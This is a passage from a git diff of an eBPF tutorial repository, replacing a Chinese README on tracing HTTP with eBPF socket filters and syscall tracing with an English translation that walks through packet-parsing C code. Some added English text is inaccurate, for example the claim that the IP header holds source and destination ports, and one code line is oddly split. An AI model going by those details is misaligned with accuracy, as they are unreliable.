functions and the status of TCP connections. - -For some cases that cannot run, the reasons are mainly the following: - -1. The kernel compilation options do not support the relevant eBPF functionality; -2. The Linux environment packaged by eadb is weak and lacks necessary dependencies; - -Currently, using eBPF tools in the Android system still requires building a complete Linux runtime environment. However, the Android kernel itself has comprehensive support for eBPF. This test proves that higher versions of the Android kernel support BTF debugging information and CO-RE dependent eBPF programs. - -The development of eBPF tools in the Android system requires the addition of official new features. Currently, it seems that using eBPF tools directly through an Android app requires a lot of effort. At the same time, since eBPF tools require root privileges, ordinary Android users will encounter more difficulties in using them. - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. - -## Reference - -+ [Google android docs](https://source.android.google.cn/docs/core/architecture/kernel/bpf) -+ [weixin WeiShu](https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA) -+ [SeeFlowerX](https://blog.seeflower.dev/archives/138/>) - -> The original link of this article: diff --git a/src/23-http/README.md b/src/23-http/README.md index a6d1104..a17c8ed 100644 --- a/src/23-http/README.md +++ b/src/23-http/README.md @@ -1,97 +1,86 @@ -# 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 +# L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints -在当今的技术环境中,随着微服务、云原生应用和复杂的分布式系统的崛起,系统的可观测性已成为确保其健康、性能和安全的关键要素。特别是在微服务架构中,应用程序的组件可能分布在多个容器和服务器上,这使得传统的监控方法往往难以提供足够的深度和广度来全面了解系统的行为。这就是为什么观测七层协议,如 HTTP、gRPC、MQTT 等,变得尤为重要。 +In today's technology landscape, with the rise of microservices, cloud-native applications, and complex distributed systems, observability of systems has become a crucial factor in ensuring their health, performance, and security. Especially in a microservices architecture, application components may be distributed across multiple containers and servers, making traditional monitoring methods often insufficient to provide the depth and breadth needed to fully understand the behavior of the system. This is where observing seven-layer protocols such as HTTP, gRPC, MQTT, and more becomes particularly important. -七层协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。在微服务环境中,了解这些交互是至关重要的,因为它们经常是性能瓶颈、故障和安全问题的根源。然而,监控这些协议并不简单。传统的网络监控工具,如 tcpdump,虽然在捕获网络流量方面非常有效,但在处理七层协议的复杂性和动态性时,它们往往显得力不从心。 +Seven-layer protocols provide detailed insights into how applications interact with other services and components. In a microservices environment, understanding these interactions is vital, as they often serve as the root causes of performance bottlenecks, failures, and security issues. However, monitoring these protocols is not a straightforward task. Traditional network monitoring tools like tcpdump, while effective at capturing network traffic, often fall short when dealing with the complexity and dynamism of seven-layer protocols. -这正是 eBPF 技术发挥作用的地方。eBPF 允许开发者和运维人员深入到系统的内核层,实时观测和分析系统的行为,而无需对应用程序代码进行任何修改或插入埋点。这为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务环境中。 +This is where eBPF (extended Berkeley Packet Filter) technology comes into play. eBPF allows developers and operators to delve deep into the kernel layer, observing and analyzing system behavior in real-time without the need to modify or insert instrumentation into application code. This presents a unique opportunity to handle application layer traffic more simply and efficiently, particularly in microservices environments. -在本教程中,我们将深入探讨以下内容: +In this tutorial, we will delve into the following: -- 追踪七层协议,如 HTTP,以及与其相关的挑战。 -- eBPF 的 socket filter 和 syscall 追踪:这两种技术如何帮助我们在不同的内核层次追踪 HTTP 网络请求数据,以及这两种方法的优势和局限性。 -- eBPF 实践教程:如何开发一个 eBPF 程序,使用 eBPF socket filter 或 syscall 追踪来捕获和分析 HTTP 流量 +- Tracking seven-layer protocols such as HTTP and the challenges associated with them. +- eBPF's socket filter and syscall tracing: How these two technologies assist in tracing HTTP network request data at different kernel layers, and the advantages and limitations of each. +- eBPF practical tutorial: How to develop an eBPF program and utilize eBPF socket filter or syscall tracing to capture and analyze HTTP traffic. -随着网络流量的增加和应用程序的复杂性增加,对七层协议的深入了解变得越来越重要。通过本教程,您将获得必要的知识和工具,以便更有效地监控和分析您的网络流量,从而为您的应用程序和服务器提供最佳的性能。 +As network traffic increases and applications grow in complexity, gaining a deeper understanding of seven-layer protocols becomes increasingly important. Through this tutorial, you will acquire the necessary knowledge and tools to more effectively monitor and analyze your network traffic, ultimately enhancing the performance of your applications and servers. -本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [here](https://eunomia.dev/tutorials/). The source code is available on the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). -## 追踪 HTTP, HTTP/2 等七层协议的挑战 +## Challenges in Tracking HTTP, HTTP/2, and Other Seven-Layer Protocols -在现代的网络环境中,七层协议不仅仅局限于 HTTP。实际上,有许多七层协议,如 HTTP/2, gRPC, MQTT, WebSocket, AMQP 和 SMTP,它们都在不同的应用场景中发挥着关键作用。这些协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。但是,追踪这些协议并不是一个简单的任务,尤其是在复杂的分布式系统中。 +In the modern networking environment, seven-layer protocols extend beyond just HTTP. In fact, there are many seven-layer protocols such as HTTP/2, gRPC, MQTT, WebSocket, AMQP, and SMTP, each serving critical roles in various application scenarios. These protocols provide detailed insights into how applications interact with other services and components. However, tracking these protocols is not a simple task, especially within complex distributed systems. -1. **多样性和复杂性**:每种七层协议都有其特定的设计和工作原理。例如,gRPC 使用了 HTTP/2 作为其传输协议,并支持多种语言。而 MQTT 是为低带宽和不可靠的网络设计的轻量级发布/订阅消息传输协议。 +1. **Diversity and Complexity**: Each seven-layer protocol has its specific design and workings. For example, gRPC utilizes HTTP/2 as its transport protocol and supports multiple languages, while MQTT is a lightweight publish/subscribe messaging transport protocol designed for low-bandwidth and unreliable networks. -2. **动态性**:许多七层协议都是动态的,这意味着它们的行为可能会根据网络条件、应用需求或其他因素而变化。 +2. **Dynamism**: Many seven-layer protocols are dynamic, meaning their behavior can change based on network conditions, application requirements, or other factors. -3. **加密和安全性**:随着安全意识的增强,许多七层协议都采用了加密技术,如 TLS/SSL。这为追踪和分析带来了额外的挑战,因为需要解密流量才能进行深入的分析。 +3. **Encryption and Security**: With increased security awareness, many seven-layer protocols employ encryption technologies such as TLS/SSL. This introduces additional challenges for tracking and analysis, as decrypting traffic is required for in-depth examination. -4. **高性能需求**:在高流量的生产环境中,捕获和分析七层协议的流量可能会对系统性能产生影响。传统的网络监控工具可能无法处理大量的并发会话。 +4. **High-Performance Requirements**: In high-traffic production environments, capturing and analyzing traffic for seven-layer protocols can impact system performance. Traditional network monitoring tools may struggle to handle a large number of concurrent sessions. -5. **数据的完整性和连续性**:与 tcpdump 这样的工具只捕获单独的数据包不同,追踪七层协议需要捕获完整的会话,这可能涉及多个数据包。这要求工具能够正确地重组和解析这些数据包,以提供连续的会话视图。 +5. **Data Completeness and Continuity**: Unlike tools like tcpdump, which capture individual packets, tracking seven-layer protocols requires capturing complete sessions, which may involve multiple packets. This necessitates tools capable of correctly reassembling and parsing these packets to provide a continuous session view. -6. **代码侵入性**:为了深入了解七层协议的行为,开发人员可能需要修改应用程序代码以添加监控功能。这不仅增加了开发和维护的复杂性,而且可能会影响应用程序的性能。 +6. **Code Intrusiveness**: To gain deeper insights into the behavior of seven-layer protocols, developers may need to modify application code to add monitoring functionalities. This not only increases development and maintenance complexity but can also impact application performance. -正如上文所述,eBPF 提供了一个强大的解决方案,允许我们在内核层面捕获和分析七层协议的流量,而无需对应用程序进行任何修改。这种方法为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务和分布式环境中。 +As mentioned earlier, eBPF provides a powerful solution, allowing us to capture and analyze seven-layer protocol traffic in the kernel layer without modifying application code. This approach not only offers insights into system behavior but also ensures optimal performance and efficiency. This is why eBPF has become the preferred technology for modern observability tools, especially in production environments that demand high performance and low latency. -在处理网络流量和系统行为时,选择在内核态而非用户态进行处理有其独特的优势。首先,内核态处理可以直接访问系统资源和硬件,从而提供更高的性能和效率。其次,由于内核是操作系统的核心部分,它可以提供对系统行为的全面视图,而不受任何用户空间应用程序的限制。 - -**无插桩追踪("zero-instrumentation observability")**的优势如下: - -1. **性能开销小**:由于不需要修改或添加额外的代码到应用程序中,所以对性能的影响最小化。 -2. **透明性**:开发者和运维人员不需要知道应用程序的内部工作原理,也不需要访问源代码。 -3. **灵活性**:可以轻松地在不同的环境和应用程序中部署和使用,无需进行任何特定的配置或修改。 -4. **安全性**:由于不需要修改应用程序代码,所以降低了引入潜在安全漏洞的风险。 - -利用 eBPF 在内核态进行无插桩追踪,我们可以实时捕获和分析系统的行为,而不需要对应用程序进行任何修改。这种方法不仅提供了对系统深入的洞察力,而且确保了最佳的性能和效率。这是为什么 eBPF 成为现代可观测性工具的首选技术,特别是在需要高性能和低延迟的生产环境中。 - -## eBPF 中的 socket filter 与 syscall 追踪:深入解析与比较 +## eBPF Socket Filter vs. Syscall Tracing: In-Depth Analysis and Comparison ### **eBPF Socket Filter** -**是什么?** -eBPF socket filter 是经典的 Berkeley Packet Filter (BPF) 的扩展,允许在内核中直接进行更高级的数据包过滤。它在套接字层操作,使得可以精细地控制哪些数据包被用户空间应用程序处理。 +**What Is It?** +eBPF socket filter is an extension of the classic Berkeley Packet Filter (BPF) that allows for more advanced packet filtering directly within the kernel. It operates at the socket layer, enabling fine-grained control over which packets are processed by user-space applications. -**主要特点:** +**Key Features:** -- **性能**:通过在内核中直接处理数据包,eBPF socket filters 减少了用户和内核空间之间的上下文切换的开销。 -- **灵活性**:eBPF socket filters 可以附加到任何套接字,为各种协议和套接字类型提供了通用的数据包过滤机制。 -- **可编程性**:开发者可以编写自定义的 eBPF 程序来定义复杂的过滤逻辑,超越简单的数据包匹配。 +- **Performance**: By handling packets directly within the kernel, eBPF socket filters reduce the overhead of context switches between user and kernel spaces. +- **Flexibility**: eBPF socket filters can be attached to any socket, providing a universal packet filtering mechanism for various protocols and socket types. +- **Programmability**: Developers can write custom eBPF programs to define complex filtering logic beyond simple packet matching. -**用途:** +**Use Cases:** -- **流量控制**:根据自定义条件限制或优先处理流量。 -- **安全性**:在它们到达用户空间应用程序之前丢弃恶意数据包。 -- **监控**:捕获特定数据包进行分析,而不影响其它流量。 +- **Traffic Control**: Restrict or prioritize traffic based on custom conditions. +- **Security**: Discard malicious packets before they reach user-space applications. +- **Monitoring**: Capture specific packets for analysis without affecting other traffic. ### **eBPF Syscall Tracing** -**是什么?** -使用 eBPF 进行的系统调用跟踪允许监视和操作应用程序发出的系统调用。系统调用是用户空间应用程序与内核交互的主要机制,因此跟踪它们可以深入了解应用程序的行为。 +**What Is It?** +System call tracing using eBPF allows monitoring and manipulation of system calls made by applications. System calls are the primary mechanism through which user-space applications interact with the kernel, making tracing them a valuable way to understand application behavior. -**主要特点:** +**Key Features:** -- **粒度**:eBPF 允许跟踪特定的系统调用,甚至是这些系统调用中的特定参数。 -- **低开销**:与其他跟踪方法相比,eBPF 系统调用跟踪旨在具有最小的性能影响。 -- **安全性**:内核验证 eBPF 程序,以确保它们不会损害系统稳定性。 +- **Granularity**: eBPF allows tracing specific system calls, even specific parameters within those system calls. +- **Low Overhead**: Compared to other tracing methods, eBPF syscall tracing is designed to have minimal performance impact. +- **Security**: Kernel validates eBPF programs to ensure they do not compromise system stability. -**工作原理:** -eBPF 系统调用跟踪通常涉及将 eBPF 程序附加到与系统调用相关的 tracepoints 或 kprobes。当跟踪的系统调用被调用时,执行 eBPF 程序,允许收集数据或甚至修改系统调用参数。 +**How It Works:** +eBPF syscall tracing typically involves attaching eBPF programs to tracepoints or kprobes related to the system calls being traced. When the traced system call is invoked, the eBPF program is executed, allowing data collection or even modification of system call parameters. -### eBPF 的 socket filter 和 syscall 追踪的对比 +### Comparison of eBPF Socket Filter and Syscall Tracing -| 项目 | eBPF Socket Filter | eBPF Syscall Tracing | -|------|--------------------|----------------------| -| **操作层** | 套接字层,主要处理从套接字接收或发送的网络数据包 | 系统调用层,监视和可能更改应用程序发出的系统调用的行为 | -| **主要用途** | 主要用于网络数据包的过滤、监控和操作 | 用于性能分析、安全监控和系统调用交互的调试 | -| **粒度** | 专注于单个网络数据包 | 可以监视与网络无关的广泛的系统活动 | -| **追踪 HTTP 流量** | 可以用于过滤和捕获通过套接字传递的 HTTP 数据包 | 可以跟踪与网络操作相关的系统调用 | +| Aspect | eBPF Socket Filter | eBPF Syscall Tracing | +| ------ | ------------------- | --------------------- | +| **Operational Layer** | Socket layer, primarily dealing with network packets received from or sent to sockets. | System call layer, monitoring and potentially altering the behavior of system calls made by applications. | +| **Primary Use Cases** | Mainly used for filtering, monitoring, and manipulation of network packets. | Used for performance analysis, security monitoring, and debugging of interactions with the network. | +| **Granularity** | Focuses on individual network packets. | Can monitor a wide range of system activities, including those unrelated to networking. | +| **Tracking HTTP Traffic** | Can be used to filter and capture HTTP packets passed through sockets. | Can trace system calls associated with networking operations, which may include HTTP traffic. | -总之,eBPF 的 socket filter 和 syscall 追踪都可以用于追踪 HTTP 流量,但 socket filters 更直接且更适合此目的。然而,如果您对应用程序如何与系统交互的更广泛的上下文感兴趣(例如,哪些系统调用导致了 HTTP 流量),那么系统调用跟踪将是非常有价值的。在许多高级的可观察性设置中,这两种工具可能会同时使用,以提供系统和网络行为的全面视图。 +In summary, both eBPF socket filters and syscall tracing can be used to trace HTTP traffic, but socket filters are more direct and suitable for this purpose. However, if you are interested in the broader context of how an application interacts with the system (e.g., which system calls lead to HTTP traffic), syscall tracing can be highly valuable. In many advanced observability setups, both tools may be used simultaneously to provide a comprehensive view of system and network behavior. -## 使用 eBPF socket filter 来捕获 HTTP 流量 +## Capturing HTTP Traffic with eBPF Socket Filter -eBPF 代码由用户态和内核态组成,这里主要关注于内核态代码。这是使用 eBPF socket filter 技术来在内核中捕获HTTP流量的主要逻辑,完整代码如下: +eBPF code consists of user-space and kernel-space components, and here we primarily focus on the kernel-space code. Below is the main logic for capturing HTTP traffic in the kernel using eBPF socket filter technology, and the complete code is provided: ```c SEC("socket") @@ -185,7 +174,7 @@ int socket_handler(struct __sk_buff *skb) } ``` -当分析这段eBPF程序时,我们将按照每个代码块的内容来详细解释,并提供相关的背景知识: +When analyzing this eBPF program, we will explain it in detail according to the content of each code block and provide relevant background knowledge: ```c SEC("socket") @@ -195,7 +184,7 @@ int socket_handler(struct __sk_buff *skb) } ``` -这是eBPF程序的入口点,它定义了一个名为 `socket_handler` 的函数,它会被内核用于处理传入的网络数据包。这个函数位于一个名为 `socket` 的 eBPF 节(section)中,表明这个程序用于套接字处理。 +This is the entry point of the eBPF program, defining a function named `socket_handler` that the kernel uses to handle incoming network packets. This function is located in an eBPF section named `socket`, indicating that it is intended for socket handling. ```c struct so_event *e; @@ -210,15 +199,15 @@ __u32 payload_length = 0; __u8 hdr_len; ``` -在这个代码块中,我们定义了一些变量来存储在处理数据包时需要的信息。这些变量包括了`struct so_event *e`用于存储事件信息,`verlen`、`proto`、`nhoff`、`ip_proto`、`tcp_hdr_len`、`tlen`、`payload_offset`、`payload_length`、`hdr_len`等用于存储数据包信息的变量。 +In this code block, several variables are defined to store information needed during packet processing. These variables include `struct so_event *e` for storing event information, `verlen`, `proto`, `nhoff`, `ip_proto`, `tcp_hdr_len`, `tlen`, `payload_offset`, `payload_length`, and `hdr_len` for storing packet information. -- `struct so_event *e;`:这是一个指向`so_event`结构体的指针,用于存储捕获到的事件信息。该结构体的具体定义在程序的其他部分。 -- `__u8 verlen;`、`__u16 proto;`、`__u32 nhoff = ETH_HLEN;`:这些变量用于存储各种信息,例如协议类型、数据包偏移量等。`nhoff`初始化为以太网帧头部的长度,通常为14字节,因为以太网帧头部包括目标MAC地址、源MAC地址和帧类型字段。 -- `__u32 ip_proto = 0;`:这个变量用于存储IP协议的类型,初始化为0。 -- `__u32 tcp_hdr_len = 0;`:这个变量用于存储TCP头部的长度,初始化为0。 -- `__u16 tlen;`:这个变量用于存储IP数据包的总长度。 -- `__u32 payload_offset = 0;`、`__u32 payload_length = 0;`:这两个变量用于存储HTTP请求的载荷(payload)的偏移量和长度。 -- `__u8 hdr_len;`:这个变量用于存储IP头部的长度。 +- `struct so_event *e;`: This is a pointer to the `so_event` structure for storing captured event information. The specific definition of this structure is located elsewhere in the program. +- `__u8 verlen;`, `__u16 proto;`, `__u32 nhoff = ETH_HLEN;`: These variables are used to store various pieces of information, such as protocol types, packet offsets, etc. `nhoff` is initialized to the length of the Ethernet frame header, typically 14 bytes, as Ethernet frame headers include destination MAC address, source MAC address, and frame type fields. +- `__u32 ip_proto = 0;`: This variable is used to store the type of the IP protocol and is initialized to 0. +- `__u32 tcp_hdr_len = 0;`: This variable is used to store the length of the TCP header and is initialized to 0. +- `__u16 tlen;`: This variable is used to store the total length of the IP packet. +- `__u32 payload_offset = 0;`, `__u32 payload_length = 0;`: These two variables are used to store the offset and length of the HTTP request payload. +- `__u8 hdr_len;`: This variable is used to store the length of the IP header. ```c bpf_skb_load_bytes(skb, 12, &proto, 2); @@ -227,20 +216,20 @@ if (proto != ETH_P_IP) return 0; ``` -在这里,代码从数据包中加载了以太网帧的类型字段,这个字段告诉我们数据包使用的网络层协议。然后,使用`__bpf_ntohs`函数将网络字节序的类型字段转换为主机字节序。接下来,代码检查类型字段是否等于IPv4的以太网帧类型(0x0800)。如果不等于,说明这个数据包不是IPv4数据包,直接返回0,放弃处理。 +Here, the code loads the Ethernet frame type field from the packet, which tells us the network layer protocol being used in the packet. It then uses the `__bpf_ntohs` function to convert the network byte order type field into host byte order. Next, the code checks if the type field is not equal to the Ethernet frame type for IPv4 (0x0800). If it's not equal, it means the packet is not an IPv4 packet, and the function returns 0, indicating that the packet should not be processed. -这里需要了解以下几个概念: +Key concepts to understand here: -- 以太网帧(Ethernet Frame):是数据链路层(第二层)的协议,用于在局域网中传输数据帧。以太网帧通常包括目标MAC地址、源MAC地址和帧类型字段。 -- 网络字节序(Network Byte Order):网络协议通常使用大端字节序(Big-Endian)来表示数据。因此,需要将从网络中接收到的数据转换为主机字节序,以便在主机上正确解释数据。 -- IPv4帧类型(ETH_P_IP):表示以太网帧中包含的协议类型字段,0x0800表示IPv4。 +- Ethernet Frame: The Ethernet frame is a data link layer (Layer 2) protocol used for transmitting data frames within a local area network (LAN). Ethernet frames typically include destination MAC address, source MAC address, and frame type fields. +- Network Byte Order: Network protocols often use big-endian byte order to represent data. Therefore, data received from the network needs to be converted into host byte order for proper interpretation on the host. Here, the type field from the network is converted to host byte order for further processing. +- IPv4 Frame Type (ETH_P_IP): This represents the frame type field in the Ethernet frame, where 0x0800 indicates IPv4. ```c if (ip_is_fragment(skb, nhoff)) return 0; ``` -这一部分的代码检查是否处理IP分片。IP分片是将较大的IP数据包分割成多个小片段以进行传输的机制。在这里,如果数据包是IP分片,则直接返回0,表示不处理分片,只处理完整的数据包。 +This part of the code checks if IP fragmentation is being handled. IP fragmentation is a mechanism for splitting larger IP packets into multiple smaller fragments for transmission. Here, if the packet is an IP fragment, the function returns 0, indicating that only complete packets will be processed. ```c static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) @@ -253,31 +242,33 @@ static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) } ``` -上述代码是一个辅助函数,用于检查传入的IPv4数据包是否为IP分片。IP分片是一种机制,当IP数据包的大小超过了网络的最大传输单元(MTU),路由器会将其分割成多个较小的片段,以便在网络上进行传输。这个函数的目的是检查数据包的分片标志(Fragmentation Flag)以及片偏移(Fragment Offset)字段,以确定是否为分片。 +The above code is a helper function used to check if the incoming IPv4 packet is an IP fragment. IP fragmentation is a mechanism where, if the size of an IP packet exceeds the Maximum Transmission Unit (MTU) of the network, routers split it into smaller fragments for transmission across the network. The purpose of this function is to examine the fragment flags and fragment offset fields within the packet to determine if it is a fragment. -下面是代码的逐行解释: +Here's an explanation of the code line by line: -1. `__u16 frag_off;`:定义一个16位无符号整数变量`frag_off`,用于存储片偏移字段的值。 -2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`:这行代码使用`bpf_skb_load_bytes`函数从数据包中加载IPv4头部的片偏移字段(`frag_off`),并加载2个字节。`nhoff`是IPv4头部在数据包中的偏移量,`offsetof(struct iphdr, frag_off)`用于计算片偏移字段在IPv4头部中的偏移量。 -3. `frag_off = __bpf_ntohs(frag_off);`:将加载的片偏移字段从网络字节序(Big-Endian)转换为主机字节序。网络协议通常使用大端字节序表示数据,而主机可能使用大端或小端字节序。这里将片偏移字段转换为主机字节序,以便进一步处理。 -4. `return frag_off & (IP_MF | IP_OFFSET);`:这行代码通过使用位运算检查片偏移字段的值,以确定是否为IP分片。具体来说,它使用位与运算符`&`将片偏移字段与两个标志位进行位与运算: - - `IP_MF`:表示"更多分片"标志(More Fragments)。如果这个标志位被设置为1,表示数据包是分片的一部分,还有更多分片。 - - `IP_OFFSET`:表示片偏移字段。如果片偏移字段不为0,表示数据包是分片的一部分,且具有片偏移值。 - 如果这两个标志位中的任何一个被设置为1,那么结果就不为零,说明数据包是IP分片。如果都为零,说明数据包不是分片。 +1. `__u16 frag_off;`: Defines a 16-bit unsigned integer variable `frag_off` to store the fragment offset field. +2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`: This line of code uses the `bpf_skb_load_bytes` function to load the fragment offset field from the packet. `nhoff` is the offset of the IP header within the packet, and `offsetof(struct iphdr, frag_off)` calculates the offset of the fragment offset field within the IPv4 header. +3. `frag_off = __bpf_ntohs(frag_off);`: Converts the loaded fragment offset field from network byte order (big-endian) to host byte order. Network protocols typically use big-endian to represent data, and the conversion to host byte order is done for further processing. +4. `return frag_off & (IP_MF | IP_OFFSET);`: This line of code checks the value of the fragment offset field using a bitwise AND operation with two flag values: + - `IP_MF`: Represents the "More Fragments" flag. If this flag is set to 1, it indicates that the packet is part of a fragmented sequence and more fragments are expected. + - `IP_OFFSET`: Represents the fragment offset field. If the fragment offset field is non-zero, it indicates that the packet is part of a fragmented sequence and has a fragment offset value. + If either of these flags is set to 1, the result is non-zero, indicating that the packet is an IP fragment. If both flags are 0, it means the packet is not fragmented. -需要注意的是,IP头部的片偏移字段以8字节为单位,所以实际的片偏移值需要左移3位来得到字节偏移。此外,IP头部的"更多分片"标志(IP_MF)表示数据包是否有更多的分片,通常与片偏移字段一起使用来指示整个数据包的分片情况。这个函数只关心这两个标志位,如果其中一个标志被设置,就认为是IP分片。 +It's important to note that the fragment offset field in the IP header is specified in units of 8 bytes, so the actual byte offset is obtained by left-shifting the value by 3 bits. Additionally, the "More Fragments" flag (IP_MF) in the IP header indicates whether there are more fragments in the sequence and is typically used in conjunction with the fragment offset field to indicate the status of fragmented packets. ```c -bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); +bpf_skb_load_bytes(skb, ETH_HLEN, & + +hdr_len, sizeof(hdr_len)); hdr_len &= 0x0f; hdr_len *= 4; ``` -这一部分的代码从数据包中加载IP头部的长度字段。IP头部长度字段包含了IP头部的长度信息,以4字节为单位,需要将其转换为字节数。这里通过按位与和乘以4来进行转换。 +In this part of the code, the length of the IP header is loaded from the packet. The IP header length field contains information about the length of the IP header in units of 4 bytes, and it needs to be converted to bytes. Here, it is converted by performing a bitwise AND operation with 0x0f and then multiplying it by 4. -需要了解: +Key concept: -- IP头部(IP Header):IP头部包含了关于数据包的基本信息,如源IP地址、目标IP地址、协议类型和头部校验和等。头部长度字段(IHL,Header Length)表示IP头部的长度,以4字节为单位,通常为20字节(5个4字节的字)。 +- IP Header: The IP header contains fundamental information about a packet, such as the source IP address, destination IP address, protocol type, total length, identification, flags, fragment offset, time to live (TTL), checksum, source port, and destination port. ```c if (hdr_len < sizeof(struct iphdr)) @@ -286,13 +277,11 @@ if (hdr_len < sizeof(struct iphdr)) } ``` -这段代码检查IP头部的长度是否满足最小长度要求,通常IP头部的最小长度是20字节。如果IP头部的长度小于20字节,说明数据包不完整或损坏,直接返回0,放弃处理。 +This code segment checks if the length of the IP header meets the minimum length requirement, typically 20 bytes. If the length of the IP header is less than 20 bytes, it indicates an incomplete or corrupted packet, and the function returns 0, indicating that the packet should not be processed. -需要了解: +Key concept: -- `struct iphdr`:这是Linux内核中定义的结构体,表示IPv4头部的格式。它包括了版本、头部长度、服务类型、总长度、 - -标识符、标志位、片偏移、生存时间、协议、头部校验和、源IP地址和目标IP地址等字段。 +- `struct iphdr`: This is a structure defined in the Linux kernel, representing the format of an IPv4 header. It includes fields such as version, header length, service type, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source IP address, and destination IP address, among others. ```c bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); @@ -302,29 +291,29 @@ if (ip_proto != IPPROTO_TCP) } ``` -在这里,代码从数据包中加载IP头部中的协议字段,以确定数据包使用的传输层协议。然后,它检查协议字段是否为TCP协议(IPPROTO_TCP)。如果不是TCP协议,说明不是HTTP请求或响应,直接返回0。 +Here, the code loads the protocol field from the IP header to determine the transport layer protocol used in the packet. Then, it checks if the protocol field is not equal to the value for TCP (IPPROTO_TCP). If it's not TCP, it means the packet is not an HTTP request or response, and the function returns 0. -需要了解: +Key concept: -- 传输层协议:IP头部中的协议字段指示了数据包所使用的传输层协议,例如TCP、UDP或ICMP。 +- Transport Layer Protocol: The protocol field in the IP header indicates the transport layer protocol used in the packet, such as TCP, UDP, or ICMP. ```c tcp_hdr_len = nhoff + hdr_len; ``` -这行代码计算了TCP头部的偏移量。它将以太网帧头部的长度(`nhoff`)与IP头部的长度(`hdr_len`)相加,得到TCP头部的起始位置。 +This line of code calculates the offset of the TCP header. It adds the length of the Ethernet frame header (`nhoff`) to the length of the IP header (`hdr_len`) to obtain the starting position of the TCP header. ```c bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); ``` -这行代码从数据包中加载TCP头部的第一个字节,该字节包含了TCP头部长度信息。这个长度字段以4字节为单位,需要进行后续的转换。 +This line of code loads the first byte of the TCP header from the packet, which contains information about the TCP header length. This length field is specified in units of 4 bytes and requires further conversion. ```c bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); ``` -这行代码从数据包中加载IP头部的总长度字段。IP头部总长度字段表示整个IP数据包的长度,包括IP头部和数据部分。 +This line of code loads the total length field of the IP header from the packet. The IP header's total length field represents the overall length of the IP packet, including both the IP header and the data portion. ```c __u8 doff; @@ -334,22 +323,22 @@ doff >>= 4; doff *= 4; ``` -这段代码用于计算TCP头部的长度。它加载TCP头部中的数据偏移字段(Data Offset,也称为头部长度字段),该字段表示TCP头部的长度以4字节为单位。代码将偏移字段的高四位清零,然后将其右移4位,最后乘以4,得到TCP头部的实际长度。 +This piece of code is used to calculate the length of the TCP header. It loads the Data Offset field (also known as the Header Length field) from the TCP header, which represents the length of the TCP header in units of 4 bytes. The code clears the high four bits of the offset field, then shifts it right by 4 bits, and finally multiplies it by 4 to obtain the actual length of the TCP header. -需要了解: +Key points to understand: -- TCP头部(TCP Header):TCP头部包含了TCP协议相关的信息,如源端口、目标端口、序列号、确认号、标志位(如SYN、ACK、FIN等)、窗口大小和校验和等。 +- TCP Header: The TCP header contains information related to the TCP protocol, such as source port, destination port, sequence number, acknowledgment number, flags (e.g., SYN, ACK, FIN), window size, and checksum. ```c payload_offset = ETH_HLEN + hdr_len + doff; payload_length = __bpf_ntohs(tlen) - hdr_len - doff; ``` -这两行代码计算HTTP请求的载荷(payload)的偏移量和长度。它们将以太网帧头部长度、IP头部长度和TCP头部长度相加,得到HTTP请求的数据部分的偏移量,然后通过减去总长度、IP头部长度和TCP头部长度,计算出HTTP请求数据的长度。 +These two lines of code calculate the offset and length of the HTTP request payload. They add the lengths of the Ethernet frame header, IP header, and TCP header together to obtain the offset to the data portion of the HTTP request. Then, by subtracting the total length, IP header length, and TCP header length from the total length field, they calculate the length of the HTTP request data. -需要了解: +Key point: -- HTTP请求载荷(Payload):HTTP请求中包含的实际数据部分,通常是HTTP请求头和请求体。 +- HTTP Request Payload: The actual data portion included in an HTTP request, typically consisting of the HTTP request headers and request body. ```c char line_buffer[7]; @@ -361,7 +350,7 @@ bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); ``` -这部分代码用于加载HTTP请求行的前7个字节,存储在名为`line_buffer`的字符数组中。然后,它检查HTTP请求数据的长度是否小于7字节或偏移量是否为负数,如果满足这些条件,说明HTTP请求不完整,直接返回0。最后,它使用`bpf_printk`函数将HTTP请求行的内容打印到内核日志中,以供调试和分析。 +This portion of the code loads the first 7 bytes of the HTTP request line and stores them in a character array named `line_buffer`. It then checks if the length of the HTTP request data is less than 7 bytes or if the offset is negative. If these conditions are met, it indicates an incomplete HTTP request, and the function returns 0. Finally, it uses the `bpf_printk` function to print the content of the HTTP request line to the kernel log for debugging and analysis. ```c if (bpf_strncmp(line_buffer, 3, "GET") != 0 && @@ -374,9 +363,9 @@ if (bpf_strncmp(line_buffer, 3, "GET") != 0 && } ``` -> 注意:bpf_strncmp 这个内核 helper 在 5.17 版本中才被引入,如果你的内核版本低于 5.17,可以手动匹配字符串来实现相同的功能。 +> Note: The `bpf_strncmp` function is a helper function available from kernel version 5.17. For earlier versions, you can manually write a function to compare strings. -这段代码使用`bpf_strncmp`函数比较`line_buffer`中的数据与HTTP请求方法(GET、POST、PUT、DELETE、HTTP)是否匹配。如果不匹配,说明不是HTTP请求,直接返回0,放弃处理。 +This piece of code uses the `bpf_strncmp` function to compare the data in `line_buffer` with HTTP request methods (GET, POST, PUT, DELETE, HTTP). If there is no match, indicating that it is not an HTTP request, it returns 0, indicating that it should not be processed. ```c e = bpf_ringbuf_reserve(&rb, 